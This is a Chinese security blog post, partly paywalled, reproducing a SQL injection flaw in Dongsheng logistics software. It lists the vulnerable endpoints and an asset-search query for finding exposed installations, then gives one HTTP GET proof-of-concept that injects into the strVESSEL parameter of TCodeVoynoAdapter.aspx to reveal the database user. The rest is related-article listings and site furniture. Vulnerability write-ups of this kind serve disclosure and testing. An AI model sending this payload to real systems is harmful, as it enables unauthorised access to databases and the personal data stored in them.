东胜物流软件 SQL注入漏洞复现

已于 2023-11-28 10:02:27 修改
阅读量1k 收藏 8
点赞数 10
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-11-27 23:05:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134656440
版权

0x01 产品简介

 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。

0x02 漏洞概述

东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

微步资产测绘:app=东胜物流软件

7d2a8a10f83a484db9dcbc288ecd6f85.png0x04 漏洞复现 

PoC-1

GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1%27+and+user+%3E0%3B-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询当前用户

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
东胜物流软件 GetProParentModuTreeList SQL注入漏洞复现
0xSec
06-13 394
东胜物流软件 GetProParentModuTreeList 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
东胜物流cms tcodevoynoadapter.aspx接口sql注入漏洞复现 [附POC]
薛定谔嘚喵博客
02-21 188
东胜物流软件是一款致力于为客户提供IT支撑的 SOP,帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。其 tcodevoynoadapter.aspx接口存在sql注入漏洞
某胜物流软件三个接口sql注入漏洞(附漏洞检测脚本)
jjjj1029056414的博客
02-23 622
东胜物流软件三个接口sql注入漏洞,附带自己写的poc脚本
bs架构 erp 进销存_理事单位业务推介东胜物流软件专业铁路物流ERP货代软件
weixin_35992880的博客
12-05 416
公司简介青岛东胜伟业软件有限公司初创于2004年11月(前身为青岛景宏物流信息技术有限公司),公司主要业务范围为航运物流相关环节的产品和服务。目前总共有员工30余人,大部分具有多年航运物流信息化经验。其中货代软件产品用户近1600家,在青岛口岸市场占有率超过30%,具有良好的口碑和广泛的覆盖率。东胜软件致力于为客户提供IT支撑的SOP,帮助客户大幅提高工作效率,降低各个环节的潜在风...
漏洞复现东胜物流软件 GetProParentModuTreeList SQL注入漏洞
siu~
06-15 397
东胜物流软件 GetProParentModuTreeList 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
1day新接口-东胜物流软件 GetProParentModuTreeList SQL注入漏洞
weixin_43167326的博客
06-14 980
青岛东胜伟业软件科技有限公司成立于2004年11月,公司创立之初以开发、销售航运物流软件(货代、报关)为主业,随着业务的拓展,公司主业扩展为三大板块,分别为物流咨询、物流信息平台、物流软件东胜物流软件是青岛东胜伟业软件有限公司开发的一款集订单管理、物流管理、仓储管理、配送管理、物流跟踪等功能于一体的物流管理软件。该软件旨在帮助物流企业提高物流效率、降低成本、提高客户满意度。
关于鄂尔多斯东胜区煤炭物流园区建设条件的思考
05-05
简介鄂尔多斯东胜区的煤炭资源及铁路运输通道,结合东胜区的煤矿资源情况及铁路运输布局,对其煤炭物流园区的建设条件进行思考,并对煤炭物流园区建设的主要影响因素进行分析,阐明了东胜区煤炭物流园区未来主要发展的...
东胜煤田北部杭东普查区延安组聚煤演化规律分析
06-18
杭东普查区位于鄂尔多斯盆地东胜煤田北部,侏罗系延安组为主要含煤地层,自上而下可划分为3个岩段5个煤组,共含煤8~20层;由于本区处于鄂尔多斯盆地北部边缘附近,延安组沉积时期,沉积环境主要以河流-三角洲相为主,伴有...
东胜煤田某矿2-2煤层厚度变化与聚煤规律
06-21
通过对东胜煤田某矿2-2煤层厚度变化的分析研究,探讨了2-2煤厚变化规律,并初步分析了聚煤规律。研究表明:该井田内2-2煤层厚度变化较大,其沉积环境属于河流沉积体系。而地壳的不均衡振荡运动和古地理环境的不断变迁,使...
东胜集装箱运输车队管理软件 高级版 .rar
05-08
东胜集装箱运输车队管理软件 高级版》是一款专为集装箱运输行业设计的专业车队管理解决方案,旨在提高运输效率,优化资源配置,降低运营成本。该软件的高级版本提供了更为全面和深入的功能,以满足复杂业务环境下...
中国各省市区代码名称(三级)Sql脚本
04-17
中国各省市区代码名称(三级)excel文档,共有3441条数据。已有上下级父子关系,可以直接导入数据库使用。 部分代码如下: CREATE TABLE [dbo].[tb_City]( [RecNo] [int] NOT NULL, [Code] [varchar](50) NULL, ...
安全和加密常识(6)Base64编码方式
二进制君
06-30 377
Base64 是一种用于将二进制数据编码为仅包含64种ASCII字符的文本格式的编码方法,注意,它不是加密算法。它设计的目的主要是使二进制数据能够通过只支持文本的传输层(如电子邮件)进行传输。Base64常用于在需要处理文本数据的场合中存储和传输二进制数据。
云计算【第一阶段(23)】Linux系统安全及应用
YCyjs的博客
06-28 776
如果需要每个用户登出时都清除输入的命令历史记录,可以在/etc/skel/.bash_logout文件中添加下面这行rm -f $HOME/.bash_history。实现过程如下:将授权使用 su 命令 的用户添加到 wheel 组,修改/etc/pam.d/su 认证配置以启用 pam_wheel 认证。d、如果注释第一行,开启第二行,表示只有whee1组内的用户才能使用su命令,root用户也被禁用su命令。在/etc/pam.d/su文件里设置禁止用户使用su命令。
加密与安全_三种方式实现基于国密非对称加密算法的加解密和签名验签
小工匠
06-30 1399
无需秘钥,“加密”后的数据不可逆。所以这也不算是“加密”,一般称为哈希(Hash)。任何长度的数据生成的哈希值长度都固定。相同数据每次生成的哈希值相同,不同的数据则不同。数据摘要/哈希,验证数据是否被篡改、或数据丢失,保障数据的完整性、不可篡改性。单向加密保存数据,如密码的保存,密码的存储普遍都是存的哈希值,登录时比较其hash值即可。
Java中的安全编码实践与防御技巧
微赚淘客开发者博客
06-30 420
在Java应用程序开发中,确保安全编码实践和防御技巧的有效实施,是保护用户数据和应用程序安全的关键。通过遵循以上建议和最佳实践,开发人员可以显著减少潜在的安全风险,提升系统的整体安全性和可靠性。大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!:利用成熟的安全框架和库,如Spring Security等,来简化安全性实现并提供额外的保护层。:保持对最新安全威胁和漏洞的了解,并采取相应的技术和工具来保护应用程序。
港口危险货物安全管理人员考试题库(含答案)
m0_66937659的博客
06-28 428
9.《消防法》第四十条规定:公众聚集的场所未经消防安全检查或者经检查不合格,擅自使用或者开业的,责令限期改正逾期不改正的,责令停止施工、停止使用或者停产停业( )。11.机关、团体、企业、事业等单位以及村民委员会,居民委员会根据需要,建立志愿消防队等多种形式的( ),开展群众性自防自救工作。B、安全生产管理制度和操作规程的完善有效性,事故应急预案的科学性、可操作性、有效性。D、安全生产管理制度和操作规程的完善有效性,事故应急预案的针对性、可操作性、有效性。4.液化石油气属于( )。
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
最新发布
亚信安全官方账号的博客
07-04 166
亚信安全发布2024年6月威胁态势
Linux系统安全及应用
yangye2424637628的博客
07-01 1138
如果第一行不注释,则root使用su切换普通用户就不需要输入密码(pam rootok. so模块的主要作用是使uid为0的用户,即root用户能够直接通过认证而不用输入密码。命令(COMMANDS):允许授权的用户通过 sudo方式执行的特权命令,需填写命令程序的完整路径,多个命令之间以逗号“,”进行分隔。1.以上两行是默认状态(即开启第一行,注释第二行),这种状态下是允许所有用户间使用su命令进行切换的。用户(user):直接授权指定的用户名,或采用“%组名”的形式(授权一个组的所有用户)。
可以帮我制作20个钢铁企业的名单吗,包括地址,联系电话,联系人
04-25
好的,我可以帮您制作20个钢铁企业的名单,以下是其中5个的信息: 1. 公司名称:鞍山钢铁股份有限公司 地址:辽宁省鞍山市铁东区解放路 联系电话:0412-6666666 联系人:张三 2. 公司名称:宝钢集团有限公司 地址:上海市浦东新区浦东南路 联系电话:021-6666666 联系人:李四 3. 公司名称:武汉钢铁股份有限公司 地址:湖北省武汉市江汉区江汉路 联系电话:027-6666666 联系人:王五 4. 公司名称:沙钢股份有限公司 地址:山东省荣成市滨海工业园区 联系电话:0631-6666666 联系人:赵六 5. 公司名称:鄂尔多斯钢铁集团有限公司 地址:内蒙古自治区鄂尔多斯市东胜区 联系电话:0477-6666666 联系人:钱七 需要更多名单吗?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值